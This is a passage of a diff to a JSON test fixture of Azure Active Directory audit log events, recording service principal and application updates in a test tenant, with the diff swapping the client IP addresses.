:\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"M
ozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": 
\\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 
Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n 
}\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -18246,9 +18246,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:31", "ExtendedProperties": [ { 
@@ -18488,7 +18488,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -18518,9 +18518,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:42:45",
 "ExtendedProperties": [
 {
@@ -18712,7 +18712,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management 
\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value
